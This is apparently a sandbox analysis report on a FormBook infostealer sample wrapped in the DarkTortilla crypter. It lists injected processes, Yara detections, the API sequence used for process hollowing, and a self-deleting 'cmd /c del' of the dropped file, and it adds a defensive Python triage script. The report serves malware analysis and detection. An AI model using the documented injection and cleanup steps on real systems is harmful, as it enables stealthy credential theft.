• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1471351039.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 3
Start time: 12:57:50
Start date: 02/10/2024
Path: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
Imagebase: 0xcc0000
File size: 43'008 bytes
MD5 hash: 9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 12:57:54
Start date: 02/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff62d7d0000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true
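The "Source" value of each Yara match encodes where in memory the rule fired, which is what turns a family hit into an injection finding. The helper below is an added example, not Joe Sandbox code; its process records are transcribed from this report's process list (a representative subset of the matches per process, for the four targets 0, 3, 4 and 5). It assumes the dump-name layout: first field = target ID, fourth field = region base address, fifth field = Windows page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE); the remaining fields are deliberately left undecoded. Under that assumption the hits separate into payload staged in writable, non-executable memory in the crypter stage (Target 0), executable code at 0x400000 inside a Temp-copied AddInProcess32.exe whose own image base is 0xcc0000 (Target 3), and executable FormBook code inside explorer.exe and cmmon32.exe (Targets 4 and 5), which is the picture the report's hollowing and injection signatures describe.

```python
"""Memory-region triage from the Yara 'Source' dump names in the process list."""
import re

# Assumed layout (this example's assumption, not documented vendor format):
# <target>.<field2>.<seq>.<base>.<protect>.<field6>.<field7>.<field8>.sdmp
DUMP_NAME = re.compile(
    r"^(?P<target>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp$"
)
PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
PROTECT_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Transcribed from the report (subset of matches per process).
PROCESSES = [
    {"target": 0, "path": r"C:\Users\user\Desktop\VFylJFPzqX.exe", "imagebase": 0x90000,
     "matches": [
         ("JoeSecurity_DarkTortilla", "00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp"),
         ("JoeSecurity_FormBook", "00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp"),
         ("JoeSecurity_FormBook", "00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp"),
     ]},
    {"target": 3, "path": r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe", "imagebase": 0xCC0000,
     "matches": [
         ("JoeSecurity_FormBook", "00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp"),
     ]},
    {"target": 4, "path": r"C:\Windows\explorer.exe", "imagebase": 0x7FF62D7D0000,
     "matches": [
         ("Windows_Trojan_Formbook_772cc62d", "00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp"),
     ]},
    {"target": 5, "path": r"C:\Windows\SysWOW64\cmmon32.exe", "imagebase": 0x1F0000,
     "matches": [
         ("JoeSecurity_FormBook", "00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp"),
         ("JoeSecurity_FormBook", "00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp"),
     ]},
]


def parse_dump_name(name):
    """Decode target ID, region base and page protection; reject unknown shapes."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    return {"target": int(m["target"], 16), "base": int(m["base"], 16),
            "protect": int(m["protect"], 16)}


def region_flags(dump, proc):
    """Classify one hit region relative to the process that owns it."""
    flags = set()
    if dump["protect"] & PAGE_EXECUTE_MASK:
        flags.add("EXEC")
    if dump["base"] != proc["imagebase"]:
        flags.add("OFF_IMAGE")
    if proc["path"].lower().startswith("c:\\windows\\"):
        flags.add("SYSTEM_BINARY")
    if dump["target"] != proc["target"]:
        flags.add("TARGET_MISMATCH")  # dump attributed to a different process
    return flags


def region_report(proc):
    """(rule, base, protection name, flags) for every match of one process."""
    rows = []
    for rule, src in proc["matches"]:
        d = parse_dump_name(src)
        prot = PROTECT_NAMES.get(d["protect"], f"{d['protect']:#x}")
        rows.append((rule, f"{d['base']:#x}", prot, sorted(region_flags(d, proc))))
    return rows


def verdict(proc):
    """Reduce a process's hit regions to one triage statement."""
    exec_flags = [f for _, _, _, f in region_report(proc) if "EXEC" in f]
    if not exec_flags:
        return "payload staged in non-executable memory"
    if any("SYSTEM_BINARY" in f for f in exec_flags):
        return "executable payload inside a Windows system binary (injection)"
    if any("OFF_IMAGE" in f for f in exec_flags):
        return "executable payload outside the process image (hollowing/manual map candidate)"
    return "executable payload at the image base"


def triage(processes=PROCESSES):
    return {p["target"]: verdict(p) for p in processes}


if __name__ == "__main__":
    for proc in PROCESSES:
        print(f"[{proc['target']}] {proc['path']}: {verdict(proc)}")
        for row in region_report(proc):
            print("    ", row)
```

The protection value is the only field this relies on beyond the base address; a real triage pipeline would additionally check whether the region is image-backed (MEM_IMAGE) before calling it hollowing, which the undecoded fields may or may not carry, so the verdict strings are worded as candidates rather than conclusions.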

Target ID: 5
Start time: 12:57:57
Start date: 02/10/2024
Path: C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\cmmon32.exe"
Imagebase: 0x1f0000
File size: 36'352 bytes
MD5 hash: DEC326E5B4D23503EA5176878DDDB683
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:12:58:00
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
                                                                                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:12:58:00
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:12:59:19
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
                                                                                                                                                                                                                                      Imagebase:0x7ff7df3b0000
                                                                                                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:12:59:24
                                                                                                                                                                                                                                      Start date:02/10/2024
                                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:explorer.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false


Execution Graph

Execution Coverage:11.8%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:8.9%
Total number of Nodes:280
Total number of Limit Nodes:19
execution_graph: node and edge listing of the rendered graph omitted. The API calls the graph nodes resolve to are: Wow64GetThreadContext, Wow64SetThreadContext, VirtualAllocEx, WriteProcessMemory, ResumeThread, CreateProcessAsUserW, VirtualProtect, GetModuleHandleW, GetCurrentThreadId, GetCurrentProcess, GetCurrentThread, DuplicateHandle, CloseHandle, DeleteFileW, CallWindowProcW, PostMessageW, CreateWindowExW.

Control-flow Graph (function 73ce3a8-73ce7a2; no API calls on the graph; the node/edge list of the interactive graph is omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: P=$P=
• API String ID: 0-3190148945
• Opcode ID: 409ea76f880a7e54395a269d9cb116ba57f0a210e9b3182bff8ef4da82a9bb7f
• Instruction ID: ce6f0839a5f3bb62968616278788865007c62f402269c559d25a99386448b886
• Opcode Fuzzy Hash: 409ea76f880a7e54395a269d9cb116ba57f0a210e9b3182bff8ef4da82a9bb7f
• Instruction Fuzzy Hash: BDC15BB4E5021ADFDB04CFAAC5858AEFBB6FF49341F208869D419AB214D734D942CF90

Control-flow Graph (function 56216b8-56218f0; internal calls to 5621cd3/5621cd8, 5621bc3/5621bc8 and 5621d44/5621d08/5621d18; no API calls on the graph; the node/edge list of the interactive graph is omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: %$%
• API String ID: 0-1956856143
• Opcode ID: 50bde0a2997e0f8a75c812797296579908183833f3da381c8f19fa89aff00283
• Instruction ID: 8f2d8e830006f885441c8848e897c4ae19cb41d81e9c0130b48f657ddc7937c2
• Opcode Fuzzy Hash: 50bde0a2997e0f8a75c812797296579908183833f3da381c8f19fa89aff00283
• Instruction Fuzzy Hash: DC514AB4D0921DDFDB08CFA6D4946AEBBB2FB8A301F108429D416A7394DB385942CF54

Control-flow Graph (function 56216a9-56218f0; internal calls to 5621cd3/5621cd8, 5621bc3/5621bc8 and 5621d44/5621d08/5621d18; no API calls on the graph; the node/edge list of the interactive graph is omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: %$%
• API String ID: 0-1956856143
• Opcode ID: 02d05ba679fd04da7dae98a33c03878532f184cd88b24cd4b14767de8ab717c0
• Instruction ID: cc569d70d88548ce2b57406647514fbf196774d2dc20d2f243b2b1a87ff5daeb
• Opcode Fuzzy Hash: 02d05ba679fd04da7dae98a33c03878532f184cd88b24cd4b14767de8ab717c0
• Instruction Fuzzy Hash: D9518F74D09219DFDB08CFE6D4946AEBBB2FF8A301F00842AD416A7394DB384942CF54

Control-flow Graph (function a21a418-a21a64e; CreateProcessAsUserW is called from block a21a4e9-a21a596; the node/edge list of the interactive graph is omitted)
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0A21A583
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 375c20aaabe52d271838b4cff8d30bad29d3cf44251ea9ad2d342cf97b3a3455
• Instruction ID: 88a54dd4d2e6980aaccee3eea0540440966909b82951f3b219924248ad964dc4
• Opcode Fuzzy Hash: 375c20aaabe52d271838b4cff8d30bad29d3cf44251ea9ad2d342cf97b3a3455
• Instruction Fuzzy Hash: 6D51077191026ADFDB24CF55C880BDDBBB5BF88314F0081AAE908B7250DB719A85CFA0

Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: :sF
• API String ID: 0-2912757881
• Opcode ID: 28c8965bf2c728c2ff560ddba1f15ef1e8cc660c0a1f8e227ddc46c237f8582a
• Instruction ID: 0c51a3ee9c0f3fe001b03ba795f0b16fe861201147e27edf61afde1a72fc0253
• Opcode Fuzzy Hash: 28c8965bf2c728c2ff560ddba1f15ef1e8cc660c0a1f8e227ddc46c237f8582a
• Instruction Fuzzy Hash: AFD10870E05628CFDB24CF66D9446DDBBB2BB8A301F10D5AAD409AB354EB349E81CF51

Strings
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: {:u
• API String ID: 0-2668801488
• Opcode ID: aff338392bc7519ab9aedfccaa0782b835be21eb042da29c3a7dcc8a3c71ab59
• Instruction ID: 2ab04e1cd43d35e5a1155f210e2bb0bdaee9fcc4df084c78f714a171a4a93123
• Opcode Fuzzy Hash: aff338392bc7519ab9aedfccaa0782b835be21eb042da29c3a7dcc8a3c71ab59
• Instruction Fuzzy Hash: 62914570A242289FCB64CF6AC9847DABBF2FF89340F5491E6D44DA7214D7309E818F51

Strings
Memory Dump Source
• Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID: -Ex
• API String ID: 0-3578307018
• Opcode ID: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
• Instruction ID: 349082d162958c17bb9fd06295ed4991bcecb0c17abf8b5f3f06a38271b33f52
• Opcode Fuzzy Hash: 39bc56f1f3333c4eefb23cf4e53caf7f8c8a3f6a8d3fa567b8181e4ebaf95beb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32610674E04618DFCB08DFE6E884A9DBBB2FF89301F10846AD405A7354DB345A46DF51
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: -Ex
                                                                                                                                                                                                                                        • API String ID: 0-3578307018
                                                                                                                                                                                                                                        • Opcode ID: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
                                                                                                                                                                                                                                        • Instruction ID: 8eaface96235e8684cd3b98072e3116b8d44dadbb52eae594301b5014f831e66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e66b99531cc166b808bb50f0ad2a4598997961ca9a061bbb0a37fac809e29d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A461D374E04618DFCB04DFE6E884AADBBB2FF89301F10846AD816A7358DB355A46DF50
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: _7i,
                                                                                                                                                                                                                                        • API String ID: 0-367628272
                                                                                                                                                                                                                                        • Opcode ID: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
                                                                                                                                                                                                                                        • Instruction ID: d57cd8351d96e976c3a93443701e17970e03583816e56c401d0eea443cd55d7c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01515e38369b1e617a3cccc05ba78ad1995763e5d3faacd2fe0e03ef6655860b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1516EB0D2520AEFCB18DFA6D4816EEBBF6EF95300F10846AD419B7250D7758642CF91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: {:u
                                                                                                                                                                                                                                        • API String ID: 0-2668801488
                                                                                                                                                                                                                                        • Opcode ID: ceb8d61544fa9862b74c1975e923aa965a95f3089e8b934d3fe6e88d61626353
                                                                                                                                                                                                                                        • Instruction ID: c59239121c7117aee5a39d4d666ebf135684ebd4980eb86714c178e7212f7b2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ceb8d61544fa9862b74c1975e923aa965a95f3089e8b934d3fe6e88d61626353
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98612474A142298FCB64CF24C988B8AFBF2BF89340F5495E6D58DAB215D7309E81CF11
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: {:u
                                                                                                                                                                                                                                        • API String ID: 0-2668801488
                                                                                                                                                                                                                                        • Opcode ID: 0eb01d916570dfb8d898ef32f70306192d48729aff677c604bd31765d95c2c8f
                                                                                                                                                                                                                                        • Instruction ID: b8c95d74848e6d5182d9100a0ee28bb627e478695635bff70af50e0137e499f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0eb01d916570dfb8d898ef32f70306192d48729aff677c604bd31765d95c2c8f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A612474A142298FCB64CF68C984B8ABBF2BF89340F5495E6D58DAB214D7309E81CF11
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: uj
                                                                                                                                                                                                                                        • API String ID: 0-3203798794
                                                                                                                                                                                                                                        • Opcode ID: 7339ccc7bc003d2913113d86506df6c48c2b0d37061a97ce7b90e62ea61447b7
                                                                                                                                                                                                                                        • Instruction ID: 27aaf98e381f112667466835b8e6b343283ad3bb8f12c10bdd162a8c172a2779
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7339ccc7bc003d2913113d86506df6c48c2b0d37061a97ce7b90e62ea61447b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F515A70E052199FCB04CFA9E8445EEFBB2FF89211F20946AD819E7254E7389A41CF51
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: <
                                                                                                                                                                                                                                        • API String ID: 0-4251816714
                                                                                                                                                                                                                                        • Opcode ID: 27c00b0832f04a85f191ff23760b1d51990ffe12cba17a661193571e2c7ee6b1
                                                                                                                                                                                                                                        • Instruction ID: ba5aa4396534d46f61dac6f0d461eab6765770cce6ba059dd8b191caf8c847b1
